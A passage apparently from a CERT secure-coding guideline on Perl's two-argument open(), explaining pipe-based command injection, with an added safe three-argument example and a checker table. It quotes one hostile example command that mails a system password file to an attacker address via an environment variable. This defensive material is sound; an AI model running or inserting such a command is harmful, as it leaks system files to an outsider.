...
open FILEHANDLE,EXPR
open FILEHANDLE,MODE,EXPR
open FILEHANDLE,MODE,EXPR,LIST
open FILEHANDLE,MODE,REFERENCE
open FILEHANDLE
Opens the file whose name is given by EXPR, and associates it with FILEHANDLE.
...
If $filename begins or ends with |, the preceding < forces it to be treated as a file name rather than a shell command. This code will not execute a shell command. However, an attacker could cause the program to hang by supplying - as the file name, which is interpreted by open() as reading standard input.
...
This code suffers from the same vulnerability as the first noncompliant code example. The <ARGV> operator opens every file provided in the @ARGV array and returns a line from each file. Unfortunately, it uses the two-argument form of open() to accomplish this task. If any element of @ARGV begins or ends with |, it is interpreted as a shell command and executed.
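The following is an added example, not code from the CERT page: it shows the three-argument form of open() used both for a single caller-supplied name (covering the - caveat above) and as a replacement for the `while (<>)` loop over @ARGV. The refusal of a bare - is a policy chosen for this example, and the sample file and the pipe-looking name are constructed inputs.

```perl
#!/usr/bin/perl
# Added example (not from the CERT page): read every path given on the
# command line with the three-argument form of open(), so that a name which
# begins or ends with '|' is treated as a file name, never as a shell
# command, and a name of "-" is not silently turned into STDIN.
use strict;
use warnings;
use Carp qw(croak);
use File::Temp qw(tempfile);

# Open $path for reading with the three-argument form. The third argument is
# always a plain file name here: no pipe syntax, no magic "-".
sub open_for_reading {
    my ($path) = @_;

    # With the two-argument form, "-" means STDIN and the program blocks
    # waiting for input. Policy for this example: refuse it explicitly.
    croak "refusing ambiguous file name '-'" if $path eq '-';

    open(my $fh, '<', $path)
        or croak "cannot open '$path' for reading: $!";
    return $fh;
}

# Replacement for `while (<>)`: visit each file in @paths with the safe
# opener and return the total number of lines read, instead of letting the
# <ARGV> operator perform a two-argument open on user-supplied names.
sub count_lines_in_files {
    my (@paths) = @_;
    my $count = 0;
    for my $path (@paths) {
        my $fh = open_for_reading($path);
        while (my $line = <$fh>) {
            $count++;
        }
        close($fh) or croak "error closing '$path': $!";
    }
    return $count;
}

# Self-contained demonstration on constructed inputs (runs when executed
# directly, not when the file is required as a library).
if (!caller) {
    # Constructed sample file in a temp location so the example runs offline.
    my ($tmp_fh, $tmp_name) = tempfile();
    print {$tmp_fh} "line one\nline two\nline three\n";
    close($tmp_fh);

    my $n = count_lines_in_files($tmp_name);
    print "read $n lines from $tmp_name\n";

    # A name ending in '|' is looked up as a literal file. It does not exist,
    # so open() fails with ENOENT rather than spawning a shell.
    eval { open_for_reading("nonexistent-file |") };
    print "pipe-looking name handled safely: $@" if $@;

    # "-" is refused rather than silently read as STDIN.
    eval { open_for_reading('-') };
    print "dash refused: $@" if $@;

    unlink $tmp_name;
}
```

Run it with no arguments to see the three cases; `count_lines_in_files(@ARGV)` is the drop-in replacement for a `while (<>)` loop in a real script. On Perl 5.22 and later the `<<>>` (double-diamond) operator gives the same effect for @ARGV directly, because it uses the three-argument open internally.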
...
Because any user can invoke the rt executable with environment variables he or she controls, a hostile user may set the RTCONFIG environment variable to a malicious command, such as:

    cat /etc/password | mail some@badguy.net
...
Tool | Version | Checker | Description |
---|---|---|---|
Perl::Critic | 5.0 | InputOutput::ProhibitTwoArgOpen | Implemented |
B::Lint | 5.0 | Use of <> | Implemented |
Bibliography
...